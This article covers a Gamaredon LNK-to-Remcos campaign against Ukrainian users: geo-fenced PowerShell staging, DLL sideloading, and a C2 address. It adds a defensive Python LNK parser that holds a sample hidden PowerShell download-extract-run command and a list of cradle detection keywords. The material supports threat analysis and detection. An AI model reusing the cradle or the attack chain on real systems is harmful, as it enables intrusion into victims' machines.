
A new targeted malware campaign linked to the Russian state-aligned group Gamaredon is abusing Windows shortcut (.LNK) files to deliver the Remcos backdoor, according to research published by Cisco Talos. Active since at least November 2024, the operation is aimed at users in Ukraine, combining war-themed lures, stealthy delivery mechanisms and tightly controlled infrastructure to maintain access in compromised environments.
Gamaredon, also known as Primitive Bear, continues to exploit the geopolitical chaos surrounding the Russia-Ukraine conflict by deploying malicious attachments disguised as sensitive military documents. These .lnk files are embedded in ZIP archives and use filenames referencing troop movements, Ukrainian agents, and combat logistics.
“The invasion of Ukraine is a common theme used by the Gamaredon group in their phishing campaigns,” notes Talos. “We can see some of the files use names of Russian or Ukrainian agents, as well as names alluding to troop movements.”
When executed, the .lnk file launches a PowerShell script that attempts to download a second-stage ZIP archive from servers hosted in Russia and Germany. These servers are geo-fenced: they serve the payload only when the requesting IP address appears to fall within Ukrainian ranges, which keeps the second stage out of reach of sandboxes and researchers outside the target country.
“All of them return HTTP error 403… Gamaredon is known to restrict access to their payload servers only to victims located in Ukraine.”
Once downloaded, the ZIP archive is extracted to %TEMP%, where a legitimate, benign executable (e.g., TivoDiag.exe) is launched and sideloads a malicious DLL placed next to it under the name the application expects (e.g., mindclient.dll). That DLL is a loader that decrypts and executes the Remcos backdoor, a commercial remote access tool that gives the operator full control of the host.

Talos observed the sideloading technique being applied to a range of legitimate host binaries, including:
- DPMHelper.exe
- TivoDiag.exe
- palemoon.exe
- Mp3tag.exe
- steamerrorreporter64.exe
“The binary which is executed is a clean application which in turn loads the malicious DLL… this file is actually a malicious loader which decrypts and executes the final Remcos payload.”
The final Remcos payload is injected into Explorer.exe and beacons to a command-and-control (C2) server at 146.185.233.96 on port 6856.
Talos analysts traced the infrastructure to the hosting providers GTHost and HyperHosting, with over a dozen servers handling payload distribution and C2. Notably, metadata embedded in the .lnk files (a shortcut's TrackerDataBlock records the NetBIOS name and MAC address of the machine that created it) showed that all of them were built on just two machines, pointing to a centralized build toolchain, which is a Gamaredon hallmark.
“The ones used in this campaign were previously seen by Talos in incidents related to this threat group.”
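The two shortcut-level artefacts described above, the PowerShell download cradle in the shortcut's arguments and the creation metadata that let Talos tie the files to two machines, can both be pulled out with a small parser of the MS-SHLLINK format. The following is an added example written for this page, not code from Talos or from the campaign: it builds a few test shortcuts in memory (every file name, URL, argument string, host name and MAC address in it is made up), flags the ones whose target and arguments look like a PowerShell fetch-unpack-run cradle, and groups samples by the MachineID and MAC recorded in their TrackerDataBlock.

```python
"""
Added example, not Talos's or Gamaredon's code: a minimal parser for Windows
shortcut (.LNK) files that extracts (1) the command-line arguments, so a
PowerShell download cradle can be flagged, and (2) the TrackerDataBlock
MachineID and MAC address, the creation metadata that lets samples be grouped
by the machine that produced them. Sample shortcuts are constructed inline by
build_lnk(); every file name, URL, argument string and machine ID is made up.
"""
import re
import struct
from collections import defaultdict

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
TRACKER_SIG = 0xA0000003          # ExtraData block carrying MachineID and the Droid GUIDs
SW_SHOWMINNOACTIVE = 7            # ShowCommand value that keeps the launched window out of sight

# Substrings typical of a PowerShell fetch-unpack-run cradle (illustrative, not exhaustive).
CRADLE_PATTERNS = [
    r"powershell", r"-w(indowstyle)?\s+hidden", r"-e(nc|ncodedcommand)?\s",
    r"downloadfile", r"downloadstring", r"invoke-webrequest", r"\biwr\b",
    r"expand-archive", r"\biex\b", r"invoke-expression",
]


def _string_data(s):
    enc = s.encode("utf-16-le")
    return struct.pack("<H", len(enc) // 2) + enc   # CountCharacters, no terminator


def build_lnk(arguments, machine_id, mac, target=r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"):
    """Construct a test shortcut: header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS + TrackerDataBlock."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)
    droid_volume = bytes.fromhex("00112233445566778899aabbccddeeff")
    droid_file = bytes.fromhex("67452301ab89ef118000") + mac   # v1 UUID: last 6 bytes (node) = MAC
    tracker = struct.pack("<IIII", 0x60, TRACKER_SIG, 0x58, 0)
    tracker += machine_id.encode().ljust(16, b"\0") + (droid_volume + droid_file) * 2
    return header + _string_data(target) + _string_data(arguments) + tracker + struct.pack("<I", 0)


def parse_lnk(data):
    """Walk the MS-SHLLINK structures and return the fields of forensic interest."""
    if len(data) < 0x4C or data[:4] != b"\x4c\0\0\0" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"show_command": struct.unpack_from("<I", data, 60)[0], "machine_id": None, "mac": None}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_IDLIST:                      # skip IDList (IDListSize + items)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                               # skip LinkInfo (self-sized)
        pos += struct.unpack_from("<I", data, pos)[0]
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:                                    # StringData, always in this order
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                info[key], pos = data[pos:pos + 2 * n].decode("utf-16-le"), pos + 2 * n
            else:
                info[key], pos = data[pos:pos + n].decode("cp1252", "replace"), pos + n
    while pos + 8 <= len(data):                             # ExtraData blocks until a terminal block
        size, sig = struct.unpack_from("<II", data, pos)
        if size < 4:
            break
        if sig == TRACKER_SIG and size >= 0x60:
            info["machine_id"] = data[pos + 16:pos + 32].split(b"\0", 1)[0].decode("ascii", "replace")
            droid_file = data[pos + 48:pos + 64]            # second GUID of Droid
            info["mac"] = ":".join(f"{b:02x}" for b in droid_file[10:16])
        pos += size
    return info


def risk_indicators(info):
    """Return the cradle patterns matched by the shortcut's target and arguments, plus window hiding."""
    text = " ".join(info.get(k) or "" for k in ("name", "relative_path", "arguments")).lower()
    hits = [p for p in CRADLE_PATTERNS if re.search(p, text)]
    if hits and info["show_command"] == SW_SHOWMINNOACTIVE:
        hits.append("show_command=SW_SHOWMINNOACTIVE")
    return hits


def cluster_by_origin(samples):
    """Group sample names by the (MachineID, MAC) pair recorded in their TrackerDataBlock."""
    groups = defaultdict(list)
    for name, blob in samples.items():
        info = parse_lnk(blob)
        groups[(info["machine_id"], info["mac"])].append(name)
    return dict(groups)


CRADLE = ('-w hidden -nop -c "iwr http://203.0.113.10/stage2.zip -o $env:TEMP\\s.zip; '
          'Expand-Archive $env:TEMP\\s.zip $env:TEMP -Force; Start-Process $env:TEMP\\TivoDiag.exe"')
SAMPLES = {   # constructed test shortcuts: two from one builder host, one from another, one benign
    "troop_movements.pdf.lnk": build_lnk(CRADLE, "BUILDER-A", bytes.fromhex("001122334455")),
    "agent_list.docx.lnk": build_lnk(CRADLE, "BUILDER-A", bytes.fromhex("001122334455")),
    "logistics.xlsx.lnk": build_lnk(CRADLE, "BUILDER-B", bytes.fromhex("66778899aabb")),
    "notepad.lnk": build_lnk("", "USER-PC", bytes.fromhex("0a0b0c0d0e0f"), target=r"..\..\Windows\notepad.exe"),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, risk_indicators(parse_lnk(blob)))
    print(cluster_by_origin(SAMPLES))
```

On real samples, replace the constructed SAMPLES dict with the bytes of the shortcuts pulled from the ZIP lures; the parser skips the LinkTargetIDList and LinkInfo structures that real shortcuts usually carry, and only the StringData and ExtraData sections are interpreted. The MAC is only meaningful when the Droid file identifier is a version 1 UUID, which is what Windows writes; a shortcut produced by a non-Windows builder may carry zeros there, which is itself a useful signal.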
Gamaredon has a long history of using custom scripts and espionage malware against Ukrainian entities, often with weak operational security but highly effective delivery. Remcos is an off-the-shelf RAT, but its use here shows the group's evolving tradecraft: LNK-based social engineering, PowerShell staging, DLL sideloading through benign applications, and geo-fenced payload delivery.